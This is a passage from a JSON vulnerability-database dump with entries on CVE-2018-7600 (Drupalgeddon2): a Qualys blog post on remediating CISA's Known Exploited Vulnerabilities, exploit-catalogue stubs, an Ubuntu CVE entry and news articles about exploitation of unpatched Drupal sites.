"CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Drupal core/lib/Drupal/Core/DrupalKernel.php\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-08T00:00:00", "type": "dsquare", "title": "Drupal 7 SA-CORE-2018-002 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-08T00:00:00", "id": "E-639", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Drupal core/lib/Drupal/Core/DrupalKernel.php\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-08T00:00:00", "type": "dsquare", "title": "Drupal 8 SA-CORE-2018-002 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-08T00:00:00", "id": "E-638", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-26T14:41:26", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before\n8.5.1 allows remote attackers to execute arbitrary code because of an issue\naffecting multiple subsystems with default or common module configurations.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "ubuntucve", "title": "CVE-2018-7600", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T00:00:00", "id": "UB:CVE-2018-7600", "href": "https://ubuntu.com/security/CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:30", "description": "[](<https://thehackernews.com/images/-gX6_9UgesoQ/WxZDSXy_kxI/AAAAAAAAw7s/DgAtVJgBWSMc7xSNuowSunrFzg-X0mqrQCLcBGAs/s728-e100/drupal-hacking.png>)\n\nHundreds of thousands of websites running on the Drupal CMS\u2014including those of major educational institutions and government organizations around the world\u2014have been found vulnerable to a [highly critical flaw](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) for which security patches were released almost two months ago. \n \nSecurity researcher Troy Mursch scanned the whole Internet and [found](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings. \n \n[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user. \n \nSince Drupalgeddon2 had much potential to derive attention of motivated attackers, the company urged all website administrators to install security patches immediately after it was released in late March and decided not to release any technical details of the flaw initially. \n\n\n[](<https://thehackernews.com/images/-qvQEU0cUz6E/WxY-T5CZxNI/AAAAAAAAw7U/EIiGG2uydmwMhw368wlEM0s5XzpFMGG8ACLcBGAs/s728-e100/drupal-hacking-exploit.png>)\n\nHowever, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) [exploit code of Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was published online, which was followed by large-scale Internet scanning and exploitation attempts. \n \nShortly after that, we saw attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon 2 vulnerability to inject [cryptocurrency miner](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>)s, backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nMursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2. \n \nWhile analyzing vulnerable websites, Mursch noticed that hundreds of them\u2014including those of Belgium police department, Colorado Attorney General office, Fiat subsidiary Magneti Marelli and food truck locating service\u2014have already been targeted by a new cryptojacking campaign. \n \nMursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed. \n \nWe have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the \"backdoors or fix compromised sites.\" To fully resolve the issue you are recommended to follow this [Drupal guide](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-05T08:06:00", "type": "thn", "title": "Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T08:06:24", "id": "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "href": "https://thehackernews.com/2018/06/drupalgeddon2-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-5T7PpU6AWTk/WtG6Fi7QwCI/AAAAAAAAwOw/y5fEvJ9j7kM_-JbVZmCYg_FMATnvpYzmACLcBGAs/s728-e100/hacking-drupal-remote-code-execution-exploit-code.png>)\n\nHackers have started exploiting a recently disclosed critical vulnerability in Drupal shortly after the public release of working exploit code. \n \nTwo weeks ago, Drupal security team [discovered](<https://www.drupal.org/sa-core-2018-002>) a highly critical remote code execution vulnerability, dubbed **Drupalgeddon2**, in its content management system software that could allow attackers to completely take over vulnerable websites. \n \nTo address this vulnerability the company immediately released updated versions of Drupal CMS without releasing any technical details of the vulnerability, giving more than a million sites enough time to patch the issue. \n \nTwo days ago, security researchers at Check Point and Dofinity [published](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) complete technical details about this vulnerability (CVE-2018-7600), using which, a Russian security researcher published a proof-of-concept (PoC) [exploit code](<https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py>) for Drupalgeddon2 on GitHub. \n \nThe Drupalgeddon2 vulnerability that affects all versions of Drupal from 6 to 8 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations. \n\n\n[](<https://thehackernews.com/images/-qsxcL4GQ5_Y/WtG9rLLIcyI/AAAAAAAAwO8/acsBgkJ4gYYe5c5Vnk2t2l3f-S95bTrBgCLcBGAs/s728-e100/drupal-exploit.png>)\n\n \nAccording to checkpoint's disclosure, the vulnerability exists due to the insufficient sanitation of inputs passed via Form API (FAPI) AJAX requests. \n \n\n\n> \"As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication,\" Check Point researchers said. \n\n> \"By exploiting this vulnerability, an attacker would have been able to carry out a full site takeover of any Drupal customer.\"\n\n \nHowever, shortly after the public release of the PoC exploit, which many confirmed to be functional, researchers at [Sucuri](<https://twitter.com/danielcid/status/984555586644688898>), [Imperva](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>), and the [SANS](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) Internet Storm Center started seeing attempts to exploit Drupalgeddon2, though none have yet to see any reports of websites being hacked. \n \nSites administrators still running vulnerable versions of Drupal are highly recommended to patch the vulnerability by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible to avoid exploits. \n \nThe vulnerability also affects Drupal 6, which is no longer supported by the company since February 2016, but a patch for the version has still been created.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-14T08:29:00", "type": "thn", "title": "Hackers Have Started Exploiting Drupal RCE Exploit Released Yesterday", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 